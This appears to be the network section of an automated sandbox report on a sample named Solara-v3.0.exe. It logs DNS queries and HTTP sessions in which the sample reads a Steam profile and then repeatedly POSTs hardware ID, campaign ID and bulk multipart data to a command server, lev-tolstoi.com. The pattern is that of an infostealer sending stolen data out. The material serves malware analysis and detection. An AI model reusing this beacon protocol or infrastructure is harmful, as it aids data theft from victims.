Dec 28, 2024 02:54:57.984738111 CET | 1.1.1.1 | 192.168.2.5 | 0xd5f | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:58.131542921 CET | 1.1.1.1 | 192.168.2.5 | 0x9116 | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:54:58.347234964 CET | 1.1.1.1 | 192.168.2.5 | 0x39b2 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:55:00.959465027 CET | 1.1.1.1 | 192.168.2.5 | 0xb878 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 02:55:00.959465027 CET | 1.1.1.1 | 192.168.2.5 | 0xb878 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 23.55.153.106 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:54:59 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: steamcommunity.com
2024-12-28 01:55:00 UTC | 1905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:00 GMT
                                                                                                                                                                                                                                            Content-Length: 35121
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=e8419891c513e89f96234b9b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 01:55:00 UTC | 14479 | IN
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 01:55:00 UTC | 10097 | IN
Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 01:55:00 UTC | 10545 | IN
Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:02 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:02 UTC | 8 | OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-28 01:55:02 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:02 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=rbskcphtngf04t5lpt3kd6p671; expires=Tue, 22 Apr 2025 19:41:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wna680s%2FhSmK4XK5jwKK5g0BNLXX5E9NGRgcT%2BwD7yQf%2Bapn0QAYGh%2BDgK2RPvDZ4YPlCLajSnw7qU3n%2BG5ddtXO7pb6YZQBZw%2FCTi5ho1vwggbm4uCIiuez8ZGLhR0bF%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded045dad7ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1798&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1567364&cwnd=179&unsent_bytes=0&cid=bb771fe3eb917f7e&ts=760&x=0"
2024-12-28 01:55:02 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-28 01:55:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:04 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 51
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:04 UTC | 51 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
2024-12-28 01:55:05 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:04 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5eau30eaiifh8hb3isi1imtbhl; expires=Tue, 22 Apr 2025 19:41:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOWJq6Jpuc5m%2FdL7DdSmZG666nmQTxd0mordr8Mvu4a%2FN5ovgjIakBTNW1RVYx7GIAJUeez04F0r1qj%2F%2FHdNSNR28HAUHBtkEV5qxHIUm4zRw0vQ1tn72TR7baothwwn6cc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded113f0b2361-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1797&rtt_var=713&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=950&delivery_rate=1495135&cwnd=239&unsent_bytes=0&cid=3a092119d1766c5b&ts=784&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49711 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:06 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=YGVW96CC
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12779
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:06 UTC | 12779 | OUT | Data Ascii:
--YGVW96CC
Content-Disposition: form-data; name="hwid"

E38030A6CBA13717BCFD68B774EF9B7A
--YGVW96CC
Content-Disposition: form-data; name="pid"

2
--YGVW96CC
Content-Disposition: form-data; name="lid"

yau6Na--899083440
--YGVW96CC
Content-Disp
2024-12-28 01:55:07 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=r141mppk5ouo2o37vcgpdgf2i5; expires=Tue, 22 Apr 2025 19:41:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Euu3o81TpI9%2FAmMlASoGGufPwcQNOqXxLHGqTcHMy5KU3ap%2B%2FZJEJpGDTPwi%2FwBN%2FrxOuCsI7zXd7hGczwD10TE97PvH7x0Ok9la61W7Ffj13u6dIsNQmF%2FrAGe2HIM6GA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded1fef3642e8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2013&rtt_var=767&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13708&delivery_rate=1416787&cwnd=250&unsent_bytes=0&cid=a4de61e357d8cc10&ts=958&x=0"
2024-12-28 01:55:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 01:55:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49712 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:08 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=G5YA9UVL8817
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15045
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:08 UTC | 15045 | OUT | Data Ascii:
--G5YA9UVL8817
Content-Disposition: form-data; name="hwid"

E38030A6CBA13717BCFD68B774EF9B7A
--G5YA9UVL8817
Content-Disposition: form-data; name="pid"

2
--G5YA9UVL8817
Content-Disposition: form-data; name="lid"

yau6Na--899083440
--G5YA9UVL88
2024-12-28 01:55:10 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:10 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ckbrr1cjb4bm2di46atjqdvpcr; expires=Tue, 22 Apr 2025 19:41:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfEuZ0stm116MUGJprIEphKK314judgtvTAVjfGC0ZzrcN89qxQn6WzeYSk7WvOUcBl%2BmVATRZRq1tfet2fIEHjzOp21ER2PcTgxSaQ6S8jEmed9KUwJBugXEn%2BItvk8m84%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded3139887277-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1868&rtt_var=701&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15978&delivery_rate=1561497&cwnd=225&unsent_bytes=0&cid=0cedec2f22f674ca&ts=1351&x=0"
2024-12-28 01:55:10 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 01:55:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:11 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=3E8GBOWGO
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20517
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:11 UTC | 15331 | OUT | Data Ascii:
--3E8GBOWGO
Content-Disposition: form-data; name="hwid"

E38030A6CBA13717BCFD68B774EF9B7A
--3E8GBOWGO
Content-Disposition: form-data; name="pid"

3
--3E8GBOWGO
Content-Disposition: form-data; name="lid"

yau6Na--899083440
--3E8GBOWGO
Content-
2024-12-28 01:55:11 UTC | 5186 | OUT | Data Raw: (binary data)
2024-12-28 01:55:12 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:12 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=tkhekq2t3n4092eo84s7hbjhn3; expires=Tue, 22 Apr 2025 19:41:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUkEI5p%2FLzxa3qQyNZg4DQQ7P5PGPI7WZeWxAZuHk72ENIbjQ4vvlPUPj9q5JpUOoDbtpZDVLJhXErWFR%2FTlFuIDMRH8lllUYv4NQRqPboO95yPLZIeflbyuupd%2BU2H0PKE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded3fcd7242bd-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6450&min_rtt=1680&rtt_var=3624&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21469&delivery_rate=1738095&cwnd=196&unsent_bytes=0&cid=ef95ba06e725dac6&ts=904&x=0"
2024-12-28 01:55:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 01:55:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49714 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:14 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6TP36CE1PS1S0XVX
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1262
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:14 UTC | 1262 | OUT | Data Raw: 2d 2d 36 54 50 33 36 43 45 31 50 53 31 53 30 58 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 36 54 50 33 36 43 45 31 50 53 31 53 30 58 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 54 50 33 36 43 45 31 50 53 31 53 30 58 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --6TP36CE1PS1S0XVXContent-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--6TP36CE1PS1S0XVXContent-Disposition: form-data; name="pid"1--6TP36CE1PS1S0XVXContent-Disposition: form-data; name="lid"yau6Na--899083440
2024-12-28 01:55:15 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=p53cuko0tv6bo4sjngcsdjh3g1; expires=Tue, 22 Apr 2025 19:41:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vJaXqQH0phhJ3a7k76eQg40%2FPmzQzLyhDps1gKf%2F2nd5PP9gV%2BgwwJ%2FwFWdL%2BlXxWbzUu4FlV892VXixHcfIQSkrVPFxf1Zhd0AJAq4mMoIc6nTp8I382vAMedGpn5n96s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded4f5ece41a9-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1603&rtt_var=617&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2176&delivery_rate=1752701&cwnd=209&unsent_bytes=0&cid=cfe03e2871278036&ts=815&x=0"
2024-12-28 01:55:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 01:55:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | 5668 | C:\Users\user\Desktop\Solara-v3.0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 01:55:16 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4BTBIVQQDUXSJ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 565698
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
2024-12-28 01:55:16 UTC | 15331 | OUT | Data Raw: 2d 2d 34 42 54 42 49 56 51 51 44 55 58 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 34 42 54 42 49 56 51 51 44 55 58 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 42 54 42 49 56 51 51 44 55 58 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 34 42 54 42 49 56 51
                                                                                                                                                                                                                                            Data Ascii: --4BTBIVQQDUXSJContent-Disposition: form-data; name="hwid"E38030A6CBA13717BCFD68B774EF9B7A--4BTBIVQQDUXSJContent-Disposition: form-data; name="pid"1--4BTBIVQQDUXSJContent-Disposition: form-data; name="lid"yau6Na--899083440--4BTBIVQ
2024-12-28 01:55:19 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qesoqphn3uspb1dcratqo93t8u; expires=Tue, 22 Apr 2025 19:41:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSQEb7trZ9Zgu3LrYFmVNqppWbPtR85thtdUSg%2BL%2Fw7YA1jXPEA6RCXc9MxJL3mpHBxELsQSrS9Mcxt9MimHN6CjUwXH6sLbDmxEL3O%2BYJ6%2B9hMGXGz%2FTdEXN4EYr0McsU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded5f78f77d05-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
